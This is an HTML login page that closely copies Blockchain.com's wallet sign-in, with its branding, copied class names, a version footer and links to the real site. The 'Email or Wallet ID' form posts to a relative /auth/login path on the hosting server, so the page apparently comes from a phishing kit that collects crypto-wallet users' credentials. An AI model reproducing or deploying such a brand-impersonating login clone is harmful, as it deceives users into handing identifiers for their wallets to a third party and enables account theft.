<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Login | Blockchain</title>
  <link rel="shortcut icon" href="/img/favicon.ico" type="image/x-icon">
  <link rel="stylesheet" href="/css/main.css">
  <script src="/js/jquery.js"></script>
</head>

<body class="mode-light">
  <div id="app">
    <div class="hLRBsB">
      <div class="fvHjxE">
        <div height="112px" class="dHvbOZ">
          <div class="iTjCBV cptUIt">
            <div class="jnHNPG fCMSDs">
              <div class="kKyXUB"><a href="https://www.blockchain.com" class="bzateK gqnaJW" color="blue600"><img src="/img/logo.svg" srcset="" height="24px" class="ixijk kyMJXT" color="auto" width="auto"></a></div>
            </div>
          </div>
        </div>
      </div>

      <div class="dXnSGZ">
        <form action="/auth/login" method="post" class="bTmCWi">
          <div class="coOByc">
            <div class="cYziAC">
              <div class="gkJLwX">
                <div class="ilzBRA" style="margin-top: 40px;">
                  <label class="ghipZq cQHyEO" for="email">
                    <div color="grey800" cursor="inherit" opacity="1" class="eGdQh">Email or Wallet ID </div>
                  </label>
                  <div class="eFunUP" height="48px">
                    <div class="Pbjyv">
                      <input name="email" id="email" height="48px" placeholder="Enter Email or Wallet ID" spellcheck="false" autocomplete="off" type="text" class="rmiWH">
                    </div>
                    <div color="error" height="48px" class="cguRtB cIoOVw" cursor="inherit" opacity="1" style="display:none;">Required</div>
                  </div>
                </div>
              </div>
              <div class="cfNveD">
                <button type="submit" height="48px" class="gqApeS jRlWXV cbx-login" disabled="" color="white" style="margin-bottom: 16px;">
                  <div color="whiteFade900" cursor="inherit" opacity="1" class="edfwkt">Continue </div>
                </button>
              </div>
            </div>
            <div class="kJoMeO">
              <div class="hfEIPj" href="#/signup">
                <div color="grey600" cursor="inherit" opacity="1" class="dZiTwf" style="cursor: pointer; margin-top: 16px;">Don't have a Blockchain Account? </div>&nbsp;<div color="blue600" class="nYDtv kiSsZI" cursor="inherit" opacity="1">Sign up Now -&gt; </div>
              </div>
            </div>
          </div>
        </form>
      </div>
      <div class="ilwOTt">
        <div class="kiwhRw">
          <div class="kXiRmv">
            <div color="grey400" class="kyfudT">
              <div class="kPtlNs">English</div>
            </div>
          </div>
          <span class="jhqRYo">
            <a color="grey400" href="https://github.com/blockchain/blockchain-wallet-v4-frontend/releases" class="ecJsZh">Version 4.83.9</a>
          </span>
          <div class="ilHcgz">
            <a color="grey400" href="https://support.blockchain.com" class="ecJsZh">
              <div color="grey400" cursor="inherit" opacity="1" class="hLxhAA">Need Help? </div>
            </a>
          </div>
        </div>
      </div>
    </div>
  </div>
  <script src="/js/main.js"></script>
</body>

</html>